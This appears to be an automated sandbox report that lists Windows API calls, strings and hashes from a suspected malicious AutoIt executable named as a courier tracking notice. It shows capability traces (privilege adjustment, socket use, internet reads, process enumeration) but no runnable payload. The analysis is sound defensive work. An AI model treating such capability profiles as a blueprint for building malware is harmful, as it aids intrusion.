                                                    • String ID:
                                                    • API String ID: 1279440585-0
                                                    • Opcode ID: 631122b776d2b58d7ad8334f921c9672d75d96b78cf7816e339b3aed743d1b83
                                                    • Instruction ID: 521232559b28256a1032463dd07d98364a0f1afe719b93518a0b0ac32d5051ab
                                                    • Opcode Fuzzy Hash: 631122b776d2b58d7ad8334f921c9672d75d96b78cf7816e339b3aed743d1b83
                                                    • Instruction Fuzzy Hash: 6E21BB35600204AFCB10AF64CD49B6EB7E9EF49724F148168E81AE7392CB70AC05EB51
                                                    APIs
                                                      • Part of subcall function 00EE0DB6: std::exception::exception.LIBCMT ref: 00EE0DEC
                                                      • Part of subcall function 00EE0DB6: __CxxThrowException@8.LIBCMT ref: 00EE0E01
                                                    • _memmove.LIBCMT ref: 00F10258
                                                    • _memmove.LIBCMT ref: 00F1036D
                                                    • _memmove.LIBCMT ref: 00F10414
                                                    Similarity
                                                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                    • String ID:
                                                    • API String ID: 1300846289-0
                                                    • Opcode ID: f3594bfb192e272ef92aaffe8944d8dc8435092632a90262669f2acb3c94d5b1
                                                    • Instruction ID: 3651767b0f4dec64c9cd0c0756fc226933af404b7926d245896149a1f3d025a7
                                                    • Opcode Fuzzy Hash: f3594bfb192e272ef92aaffe8944d8dc8435092632a90262669f2acb3c94d5b1
                                                    • Instruction Fuzzy Hash: DC02D071A00209DBCF04DF64D981AAEBBF5FF44310F14806AE80AEB355EB75D991DB91
                                                    APIs
                                                      • Part of subcall function 00EC2612: GetWindowLongW.USER32(?,000000EB), ref: 00EC2623
                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 00EC19FA
                                                    • GetSysColor.USER32(0000000F), ref: 00EC1A4E
                                                    • SetBkColor.GDI32(?,00000000), ref: 00EC1A61
                                                      • Part of subcall function 00EC1290: DefDlgProcW.USER32(?,00000020,?), ref: 00EC12D8
                                                    Similarity
                                                    • API ID: ColorProc$LongWindow
                                                    • String ID:
                                                    • API String ID: 3744519093-0
                                                    • Opcode ID: 60115f0ca3b5a12b7a7b5007d2badc17267de45e27fc46f887c274056398dabc
                                                    • Instruction ID: 9b8805347d9570e476ff86a038dab066bac2aab767787f0b2401fa487abd7fc6
                                                    • Opcode Fuzzy Hash: 60115f0ca3b5a12b7a7b5007d2badc17267de45e27fc46f887c274056398dabc
                                                    • Instruction Fuzzy Hash: BEA12A71106548BAE628AA298E44FFF399CDB83349B14315EF613F5193CB27DD03A6B1
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00F2BCE6
                                                    • _wcscmp.LIBCMT ref: 00F2BD16
                                                    • _wcscmp.LIBCMT ref: 00F2BD2B
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00F2BD3C
                                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00F2BD6C
                                                    Similarity
                                                    • API ID: Find$File_wcscmp$CloseFirstNext
                                                    • String ID:
                                                    • API String ID: 2387731787-0
                                                    • Opcode ID: 45d9365e9e2ccf46c76c0e0f8dcc902ca13c7bea370d78f724aa9eaff1a466f0
                                                    • Instruction ID: c024eacb3e62cba533261844786b90375c7a263da07d863b965019abeaa41b4e
                                                    • Opcode Fuzzy Hash: 45d9365e9e2ccf46c76c0e0f8dcc902ca13c7bea370d78f724aa9eaff1a466f0
                                                    • Instruction Fuzzy Hash: B151AC36A046129FC718DF28D890EEAB3E8FF49320F50461DE95A973A1DB30ED05DB91
                                                    APIs
                                                      • Part of subcall function 00F37D8B: inet_addr.WSOCK32(00000000), ref: 00F37DB6
                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00F3679E
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00F367C7
                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00F36800
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00F3680D
                                                    • closesocket.WSOCK32(00000000), ref: 00F36821
                                                    Similarity
                                                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 99427753-0
                                                    • Opcode ID: 43da73eedf4a4a175dc84814773aaa93f49d390499e2eff5bac8eea55b4771e1
                                                    • Instruction ID: 8febbff9f0a160552c3bd6da97dcd08f996704b3ed7df552e749542b3c92554a
                                                    • Opcode Fuzzy Hash: 43da73eedf4a4a175dc84814773aaa93f49d390499e2eff5bac8eea55b4771e1
                                                    • Instruction Fuzzy Hash: 2D41C376A00204AFDB10AF248E86F6E77E8AF49724F44845CFD1AAB3D3CA759D019791
                                                    APIs
                                                    Similarity
                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                    • String ID:
                                                    • API String ID: 292994002-0
                                                    • Opcode ID: 17f568b93485a041c62375313d1ae0547db1ab742cd1547b59da617e98776c7c
                                                    • Instruction ID: c474773421f239bfbd5e73ab02d9c970a9ace2a4c6db78e3b78dd568b7b25d45
                                                    • Opcode Fuzzy Hash: 17f568b93485a041c62375313d1ae0547db1ab742cd1547b59da617e98776c7c
                                                    • Instruction Fuzzy Hash: EC1108327005146FEB206F26DC44B6F7F99EF45BA0B04402CFC45D7242CB70DC029690
                                                    APIs
                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F180C0
                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F180CA
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F180D9
                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F180E0
                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F180F6
                                                    Similarity
                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 44706859-0
                                                    • Opcode ID: bca4e3fa84dfcdc3ad84283e5a5059df6c92555a88d8785ca7867a3235077634
                                                    • Instruction ID: 6ef2b1c2a79db2b8d8165dd32fa509b138b3090928a3342be8b67deea1388955
                                                    • Opcode Fuzzy Hash: bca4e3fa84dfcdc3ad84283e5a5059df6c92555a88d8785ca7867a3235077634
                                                    • Instruction Fuzzy Hash: F1F06835240208BFE7100FA5DC8DEA73BACEF867A5B000025F949D6151CB619C46EA60
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00EC4AD0), ref: 00EC4B45
                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00EC4B57
                                                    Strings
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                    • API String ID: 2574300362-192647395
                                                    • Opcode ID: a2822527ce1a21daf0561409b01dcc9c0cd05a83b00aa7cdbf23e18075947262
                                                    • Instruction ID: f4dfcd288449cdd9b8a574e68d11d962d6f9222f45173b88d7832b5692a182a7
                                                    • Opcode Fuzzy Hash: a2822527ce1a21daf0561409b01dcc9c0cd05a83b00aa7cdbf23e18075947262
                                                    • Instruction Fuzzy Hash: 99D0C2B4A00B17CFC7208F31D928F4676E4AF82388B10883E9889D2190D670D884D614
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00F3EE3D
                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00F3EE4B
                                                      • Part of subcall function 00EC7DE1: _memmove.LIBCMT ref: 00EC7E22
                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00F3EF0B
                                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00F3EF1A
                                                    Similarity
                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                    • String ID:
                                                    • API String ID: 2576544623-0
                                                    • Opcode ID: a00465d31c6821ee7b50e2e56e6127cda2e087e8af877aed6a4f8c8301db754d
                                                    • Instruction ID: 415f8191fa6eacb3825bd42aaf4df92eba4755c26e214988af139f9ba97b6155
                                                    • Opcode Fuzzy Hash: a00465d31c6821ee7b50e2e56e6127cda2e087e8af877aed6a4f8c8301db754d
                                                    • Instruction Fuzzy Hash: BB5190715043049FD310EF20CD85F6BB7E8EF94710F10582DF995A72A1EB71A909CB92
                                                    APIs
                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00F1E628
                                                    Strings
                                                    Similarity
                                                    • API ID: lstrlen
                                                    • String ID: ($|
                                                    • API String ID: 1659193697-1631851259
                                                    • Opcode ID: 232c9859cc451a586a01b46c4966bafe3cf4993441fa68a5ccb071a2f7c722b4
                                                    • Instruction ID: 8c90db8025071f269fdc17880de39d05e3eb5dbcb963fe7137fce54e155c77bc
                                                    • Opcode Fuzzy Hash: 232c9859cc451a586a01b46c4966bafe3cf4993441fa68a5ccb071a2f7c722b4
                                                    • Instruction Fuzzy Hash: 5B322775A007059FD728CF19C481AAAB7F1FF48320B15C56EE89ADB3A1E770E981CB40
                                                    APIs
                                                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00F3180A,00000000), ref: 00F323E1
                                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00F32418
                                                    Similarity
                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                    • String ID:
                                                    • API String ID: 599397726-0
                                                    • Opcode ID: e586b6c6bb4b9df02e632128b8395db3231b542aec4dd0097d8500983cceffdf
                                                    • Instruction ID: 0d9e71b0cf03356ecf6502d6678b042a16b3566b3fe7c052842afa258f350c40
                                                    • Opcode Fuzzy Hash: e586b6c6bb4b9df02e632128b8395db3231b542aec4dd0097d8500983cceffdf
                                                    • Instruction Fuzzy Hash: 8241F372904209FFEB50DE95DC81FBFB7BCEB40734F10402AFA05A6141EA759E41B660
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 00F2B40B
                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00F2B465
                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00F2B4B2
                                                    Similarity
                                                    • API ID: ErrorMode$DiskFreeSpace
                                                    • String ID:
                                                    • API String ID: 1682464887-0
                                                    • Opcode ID: efe819e65d5e31edfac5f0ae9b30639590f8c1d702cb298633efbb5a53f88566
                                                    • Instruction ID: 94cc3913ce91b45c369120f07e8d88da17fd66ff1b26d82489a6836274c8fca3
                                                    • Opcode Fuzzy Hash: efe819e65d5e31edfac5f0ae9b30639590f8c1d702cb298633efbb5a53f88566
                                                    • Instruction Fuzzy Hash: 54215135A00518DFCB00EF55D884EEDBBB8FF49314F1480A9E905AB351CB319955DB51
                                                    APIs
                                                      • Part of subcall function 00EE0DB6: std::exception::exception.LIBCMT ref: 00EE0DEC
                                                      • Part of subcall function 00EE0DB6: __CxxThrowException@8.LIBCMT ref: 00EE0E01
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F1882B
                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F18858
                                                    • GetLastError.KERNEL32 ref: 00F18865
                                                    Similarity
                                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                    • String ID:
                                                    • API String ID: 1922334811-0
                                                    • Opcode ID: ad7407252228b1ac8c118c66795a87e31c461a862f1893bd30b3cbf0edd5cc1a
                                                    • Instruction ID: 4ed624278bdb46f0ecdcfae9a0c9366d09a0f94f3b2b1c027f6083b29123c4e8
                                                    • Opcode Fuzzy Hash: ad7407252228b1ac8c118c66795a87e31c461a862f1893bd30b3cbf0edd5cc1a
                                                    • Instruction Fuzzy Hash: 1F11BFB2804209AFE718DFA4DC85D6BB7F8EB45320B20852EF45593201EB70BC818B60
                                                    APIs
                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00F18774
                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00F1878B
                                                    • FreeSid.ADVAPI32(?), ref: 00F1879B
                                                    Similarity
                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                    • String ID:
                                                    • API String ID: 3429775523-0
                                                    APIs
                                                    • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00F24CB3
                                                    Similarity
                                                    • API ID: mouse_event
                                                    • String ID: DOWN
                                                    • API String ID: 2434400541-711622031
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00F2C6FB
                                                    • FindClose.KERNEL32(00000000), ref: 00F2C72B
                                                    Similarity
                                                    • API ID: Find$CloseFileFirst
                                                    • String ID:
                                                    • API String ID: 2295610775-0
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00F39468,?,00F4FB84,?), ref: 00F2A097
                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00F39468,?,00F4FB84,?), ref: 00F2A0A9
                                                    Similarity
                                                    • API ID: ErrorFormatLastMessage
                                                    • String ID:
                                                    • API String ID: 3479602957-0
                                                    APIs
                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F18309), ref: 00F181E0
                                                    • CloseHandle.KERNEL32(?,?,00F18309), ref: 00F181F2
                                                    Similarity
                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                    • String ID:
                                                    • API String ID: 81990902-0
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00EE8D57,?,?,?,00000001), ref: 00EEA15A
                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00EEA163
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    APIs
                                                    • __time64.LIBCMT ref: 00F2889B
                                                      • Part of subcall function 00EE520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00F28F6E,00000000,?,?,?,?,00F2911F,00000000,?), ref: 00EE5213
                                                      • Part of subcall function 00EE520A: __aulldiv.LIBCMT ref: 00EE5233
                                                    Similarity
                                                    • API ID: Time$FileSystem__aulldiv__time64
                                                    • String ID:
                                                    • API String ID: 2893107130-0
                                                    APIs
                                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00F18389), ref: 00F187D1
                                                    Similarity
                                                    • API ID: LogonUser
                                                    • String ID:
                                                    • API String ID: 1244722697-0
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00EEA12A
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 98848af307c74756287dcdb4bc49f08220220f3990afa70f3eac603fa3957036
                                                    • Instruction ID: ae6484c24b91aba6a4620f06d89ffecaa4209e6e38d417073ba4a57cc30599f1
                                                    • Opcode Fuzzy Hash: 98848af307c74756287dcdb4bc49f08220220f3990afa70f3eac603fa3957036
                                                    • Instruction Fuzzy Hash: EE225731904146CBCF388B64C5A47BC77A1FBC1718F68906BD89AAB692DB70DDC2E741
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                    • Instruction ID: 6398348a2dac34a92f0e9eeb50fc9beffd2cb88f8a307f29a320aca3bc9c1b7d
                                                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                    • Instruction Fuzzy Hash: E5C18A322051D709DF2D4A3B883403EFBA55EA27B631A279DD5B3EB1D4EE20C9B5D610
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                    • Instruction ID: 74e5bd55a6fe265aae52abb96266ae24bef2d05a73a212b3c9a476764a8d9d5b
                                                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                    • Instruction Fuzzy Hash: 5BC197322051D709DF2D4A3BC83403EBBA55EA27B631A27ADD4B2EB1D5EE20C975D610
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                    • Instruction ID: a24a63e51abed358b7acbc90a1e474d30eb2410ae94e94b3a0b7685470bd626a
                                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                    • Instruction Fuzzy Hash: 4AC173322051D749DF2D463B887413EFAA15EA27B631A27EDD4B2EB1C4EE30C9B5D610
                                                    APIs
                                                    • DeleteObject.GDI32(00000000), ref: 00F3785B
                                                    • DeleteObject.GDI32(00000000), ref: 00F3786D
                                                    • DestroyWindow.USER32 ref: 00F3787B
                                                    • GetDesktopWindow.USER32 ref: 00F37895
                                                    • GetWindowRect.USER32(00000000), ref: 00F3789C
                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00F379DD
                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00F379ED
                                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F37A35
                                                    • GetClientRect.USER32(00000000,?), ref: 00F37A41
                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00F37A7B
                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F37A9D
                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F37AB0
                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F37ABB
                                                    • GlobalLock.KERNEL32(00000000), ref: 00F37AC4
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F37AD3
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00F37ADC
                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F37AE3
                                                    • GlobalFree.KERNEL32(00000000), ref: 00F37AEE
                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F37B00
                                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00F52CAC,00000000), ref: 00F37B16
                                                    • GlobalFree.KERNEL32(00000000), ref: 00F37B26
                                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00F37B4C
                                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00F37B6B
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F37B8D
                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F37D7A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                    • API String ID: 2211948467-2373415609
                                                    • Opcode ID: 49fde2b7238490de3d16a3f177236bc431ca7600b07804dd4fbc891be012040f
                                                    • Instruction ID: 520d9673e843096c35f24dce5ed358630643dd01a346b4e91bf31482b32c5120
                                                    • Opcode Fuzzy Hash: 49fde2b7238490de3d16a3f177236bc431ca7600b07804dd4fbc891be012040f
                                                    • Instruction Fuzzy Hash: 90026D75900219EFDB14DFA4DD89EAE7BB9FF49720F148158F905AB2A1CB30AD01DB60
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?,00F4F910), ref: 00F43627
                                                    • IsWindowVisible.USER32(?), ref: 00F4364B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpperVisibleWindow
                                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                    • API String ID: 4105515805-45149045
                                                    • Opcode ID: 33a64a659ef205bad7dd27aceb98fa58d24512bdb706a7bf9bfc553892af80f4
                                                    • Instruction ID: b71a978dc54403d3795ee84fedab0dd59b6d50a3270a06fbb443407280951df0
                                                    • Opcode Fuzzy Hash: 33a64a659ef205bad7dd27aceb98fa58d24512bdb706a7bf9bfc553892af80f4
                                                    • Instruction Fuzzy Hash: 15D182312083059BCB04EF10C955E6E7BE1AF95354F154468FC896B3A3CB75EE8AEB42
                                                    APIs
                                                    • SetTextColor.GDI32(?,00000000), ref: 00F4A630
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00F4A661
                                                    • GetSysColor.USER32(0000000F), ref: 00F4A66D
                                                    • SetBkColor.GDI32(?,000000FF), ref: 00F4A687
                                                    • SelectObject.GDI32(?,00000000), ref: 00F4A696
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00F4A6C1
                                                    • GetSysColor.USER32(00000010), ref: 00F4A6C9
                                                    • CreateSolidBrush.GDI32(00000000), ref: 00F4A6D0
                                                    • FrameRect.USER32(?,?,00000000), ref: 00F4A6DF
                                                    • DeleteObject.GDI32(00000000), ref: 00F4A6E6
                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00F4A731
                                                    • FillRect.USER32(?,?,00000000), ref: 00F4A763
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00F4A78E
                                                      • Part of subcall function 00F4A8CA: GetSysColor.USER32(00000012), ref: 00F4A903
                                                      • Part of subcall function 00F4A8CA: SetTextColor.GDI32(?,?), ref: 00F4A907
                                                      • Part of subcall function 00F4A8CA: GetSysColorBrush.USER32(0000000F), ref: 00F4A91D
                                                      • Part of subcall function 00F4A8CA: GetSysColor.USER32(0000000F), ref: 00F4A928
                                                      • Part of subcall function 00F4A8CA: GetSysColor.USER32(00000011), ref: 00F4A945
                                                      • Part of subcall function 00F4A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F4A953
                                                      • Part of subcall function 00F4A8CA: SelectObject.GDI32(?,00000000), ref: 00F4A964
                                                      • Part of subcall function 00F4A8CA: SetBkColor.GDI32(?,00000000), ref: 00F4A96D
                                                      • Part of subcall function 00F4A8CA: SelectObject.GDI32(?,?), ref: 00F4A97A
                                                      • Part of subcall function 00F4A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00F4A999
                                                      • Part of subcall function 00F4A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F4A9B0
                                                      • Part of subcall function 00F4A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00F4A9C5
                                                      • Part of subcall function 00F4A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F4A9ED
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                    • String ID:
                                                    • API String ID: 3521893082-0
                                                    • Opcode ID: d898fb3aebd6c722afbcc7b9d380e64f3d112eab171bc20d89deee1431608430
